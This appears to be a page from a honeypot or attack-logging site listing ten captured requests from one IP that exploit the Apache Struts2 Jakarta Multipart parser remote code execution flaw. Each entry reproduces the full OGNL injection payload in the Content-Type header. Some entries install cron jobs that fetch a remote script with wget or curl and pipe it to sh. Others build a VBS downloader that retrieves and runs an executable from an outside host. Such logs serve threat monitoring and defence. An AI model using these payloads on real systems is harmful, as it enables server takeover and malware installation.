1-10 of 6486 results (649 pages)

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 18:24:49
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /struts2-showcase/showcase.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 17:27:00
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 09:52:17
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 06:22:57
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 18:19:09
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 09:51:44
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/18 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/28 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 05:11:27
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 26/04/2017 03:35:53
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")>test.vbs&echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>test.vbs&echo xHttp.Open "GET", "http://45.76.89.48/mss.exe", False>>test.vbs&echo xHttp.Send>>test.vbs&echo with bStrm>>test.vbs&echo .type = ^1>>test.vbs&echo .open>>test.vbs&echo .write xHttp.responseBody>>test.vbs&echo .savetofile ^"mss.exe^", ^2>>test.vbs&echo end with>>test.vbs&cscript test.vbs&&del test.vbs&mss.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 25/04/2017 09:50:04
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/18 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/28 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 25/04/2017 01:22:43
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /login.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/17 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/27 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}